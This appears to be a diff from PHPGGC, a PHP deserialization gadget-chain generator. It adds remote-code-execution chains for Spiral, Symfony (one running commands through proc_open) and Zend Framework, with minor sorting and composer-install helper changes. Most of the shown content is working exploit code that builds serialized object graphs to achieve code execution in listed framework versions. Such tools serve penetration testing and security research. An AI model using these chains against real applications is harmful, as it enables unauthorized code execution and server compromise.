9 | protected $dateFormat; | |
10 | ||
11 | function __construct($function,$param) | |
12 | { | |
13 | $this->dateFormat = "l"; | |
14 | $this->mustRotate = true; | |
15 | $this->filename = "anything"; | |
16 | $this->filenameFormat = new \Spiral\Reactor\FileDeclaration($function,$param); | |
17 | } | |
18 | } | |
19 | } | |
20 | ||
21 | namespace Spiral\Reactor | |
22 | { | |
23 | class FileDeclaration | |
24 | { | |
25 | private $docComment; | |
26 | ||
27 | public function __construct($function,$parameter) | |
28 | { | |
29 | $this->docComment = new \PhpOption\LazyOption($function,$parameter); | |
30 | } | |
31 | } | |
32 | } | |
33 | ||
34 | namespace PhpOption | |
35 | { | |
36 | class LazyOption | |
37 | { | |
38 | private $callback; | |
39 | private $arguments; | |
40 | ||
41 | public function __construct($function,$parameter) | |
42 | { | |
43 | $this->callback = $function; | |
44 | $this->arguments = [$parameter]; | |
45 | } | |
46 | } | |
47 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Spiral; | |
3 | ||
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '-2.8+'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | public static $information = 'execute the function and throw an error'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \App\App($function,$parameter); | |
17 | } | |
18 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace App | |
3 | { | |
4 | class App | |
5 | { | |
6 | protected $finalizer; | |
7 | ||
8 | function __construct($function,$param) | |
9 | { | |
10 | $this->finalizer = new \Spiral\Boot\Finalizer($function,$param); | |
11 | } | |
12 | } | |
13 | } | |
14 | ||
15 | namespace Spiral\Boot | |
16 | { | |
17 | class Finalizer | |
18 | { | |
19 | private $finalizers; | |
20 | ||
21 | function __construct($function,$param) | |
22 | { | |
23 | $this->finalizers = [[new \PhpOption\LazyOption($function,$param),"get"]]; | |
24 | } | |
25 | } | |
26 | } | |
27 | ||
28 | namespace PhpOption | |
29 | { | |
30 | class LazyOption | |
31 | { | |
32 | private $callback; | |
33 | private $arguments; | |
34 | ||
35 | public function __construct($function,$parameter) | |
36 | { | |
37 | $this->callback = $function; | |
38 | $this->arguments = [$parameter]; | |
39 | } | |
40 | } | |
41 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Symfony; | |
3 | ||
4 | class RCE6 extends \PHPGGC\GadgetChain\RCE\Command | |
5 | { | |
6 | public static $version = 'v3.4.0-BETA4 <= v3.4.49 & v4.0.0-BETA4 <= v4.1.13'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | public static $information = 'Executes given command through proc_open()'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $command = $parameters['command']; | |
14 | ||
15 | return new \Symfony\Component\Routing\Loader\Configurator\ImportConfigurator( | |
16 | $command | |
17 | ); | |
18 | } | |
19 | } |
0 | <?php | |
1 | namespace Symfony\Component\Routing\Loader\Configurator | |
2 | { | |
3 | class ImportConfigurator | |
4 | { | |
5 | private $parent; | |
6 | ||
7 | function __construct($cmd) | |
8 | { | |
9 | $this->parent = new \Symfony\Component\Cache\Traits\RedisProxy($cmd); | |
10 | } | |
11 | } | |
12 | } | |
13 | ||
14 | namespace Symfony\Component\Cache\Traits | |
15 | { | |
16 | class RedisProxy | |
17 | { | |
18 | private $initializer; | |
19 | private $redis; | |
20 | ||
21 | function __construct($cmd) | |
22 | { | |
23 | $this->initializer = new \Symfony\Component\DependencyInjection\Loader\Configurator\InstanceofConfigurator($cmd); | |
24 | $this->redis = $cmd; | |
25 | } | |
26 | } | |
27 | } | |
28 | ||
29 | namespace Symfony\Component\DependencyInjection\Loader\Configurator | |
30 | { | |
31 | class InstanceofConfigurator | |
32 | { | |
33 | protected $parent; | |
34 | ||
35 | function __construct($cmd) | |
36 | { | |
37 | $this->parent = new \Symfony\Component\Cache\Simple\Psr6Cache($cmd); | |
38 | } | |
39 | ||
40 | } | |
41 | } | |
42 | ||
43 | namespace Symfony\Component\Cache\Simple | |
44 | { | |
45 | class Psr6Cache | |
46 | { | |
47 | private $pool; | |
48 | ||
49 | function __construct($cmd) | |
50 | { | |
51 | $this->pool = new \Symfony\Component\Cache\Adapter\PhpArrayAdapter($cmd); | |
52 | } | |
53 | ||
54 | } | |
55 | } | |
56 | ||
57 | namespace Symfony\Component\Cache\Adapter | |
58 | { | |
59 | class PhpArrayAdapter | |
60 | { | |
61 | private $values; | |
62 | private $createCacheItem; | |
63 | ||
64 | function __construct($cmd) | |
65 | { | |
66 | $this->values = array($cmd=>[]); | |
67 | $this->createCacheItem = "proc_open"; | |
68 | } | |
69 | } | |
70 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\ZendFramework; | |
3 | ||
4 | class RCE5 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '2.0.0rc2 <= 2.5.3'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'CyanM0un'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters["function"]; | |
13 | $parameter = $parameters["parameter"]; | |
14 | ||
15 | return new \Zend\Cache\Storage\Adapter\Memory($function, $parameter); | |
16 | } | |
17 | } |
0 | <?php | |
1 | namespace Zend\Cache\Storage\Adapter | |
2 | { | |
3 | class Memory | |
4 | { | |
5 | protected $eventHandles; | |
6 | protected $events; | |
7 | ||
8 | function __construct($function, $param) | |
9 | { | |
10 | $this->eventHandles = [1]; | |
11 | $this->events = new \Zend\View\Renderer\PhpRenderer($function, $param); | |
12 | } | |
13 | } | |
14 | } | |
15 | ||
16 | namespace Zend\View\Renderer | |
17 | { | |
18 | class PhpRenderer | |
19 | { | |
20 | private $__helpers; | |
21 | ||
22 | function __construct($function, $param) | |
23 | { | |
24 | $this->__helpers = new \Zend\Tag\Cloud\DecoratorPluginManager($function, $param); | |
25 | } | |
26 | } | |
27 | } | |
28 | ||
29 | namespace Zend\Tag\Cloud | |
30 | { | |
31 | class DecoratorPluginManager | |
32 | { | |
33 | protected $canonicalNames; | |
34 | protected $invokableClasses; | |
35 | protected $retrieveFromPeeringManagerFirst; | |
36 | protected $initializers; | |
37 | ||
38 | function __construct($function, $param) | |
39 | { | |
40 | $this->canonicalNames = array("detach"=>"cname","cname"=>"any"); | |
41 | $this->invokableClasses = array("cname"=>"Zend\Tag\Cloud\DecoratorPluginManager");//satisfying the class_exists | |
42 | $this->retrieveFromPeeringManagerFirst = false; | |
43 | $this->initializers = [new \Zend\Filter\FilterChain($function, $param)]; | |
44 | } | |
45 | } | |
46 | } | |
47 | ||
48 | namespace Zend\Filter | |
49 | { | |
50 | class FilterChain | |
51 | { | |
52 | protected $filters; | |
53 | ||
54 | function __construct($function, $param) | |
55 | { | |
56 | $this->filters = new \SplFixedArray(2); | |
57 | $this->filters[0] = array( | |
58 | new \Zend\Json\Expr($param), | |
59 | "__toString" | |
60 | ); | |
61 | $this->filters[1] = $function; | |
62 | } | |
63 | } | |
64 | } | |
65 | ||
66 | namespace Zend\Json | |
67 | { | |
68 | class Expr | |
69 | { | |
70 | protected $expression; | |
71 | ||
72 | function __construct($param) | |
73 | { | |
74 | $this->expression = $param; | |
75 | } | |
76 | } | |
77 | } |
231 | 231 | }, $classes); |
232 | 232 | |
233 | 233 | $gcs = array_combine($names, $classes); |
234 | ksort($gcs); | |
234 | ksort($gcs, SORT_NATURAL); | |
235 | 235 | |
236 | 236 | return $gcs; |
237 | 237 | } |
234 | 234 | """Uses composer to install a specific version of the package.""" |
235 | 235 | self.clean_workdir() |
236 | 236 | _, stderr = self._executor.composer( |
237 | "require", "-q", "--ignore-platform-reqs", f"{self.name}:{version}" | |
237 | "require", | |
238 | "--no-scripts", | |
239 | "--no-interaction", | |
240 | "--no-plugins", | |
241 | "--quiet", | |
242 | "--ignore-platform-reqs", | |
243 | f"{self.name}:{version}", | |
238 | 244 | ) |
239 | 245 | if stderr: |
240 | 246 | raise ValueError(f"Unable to install version: {version}") |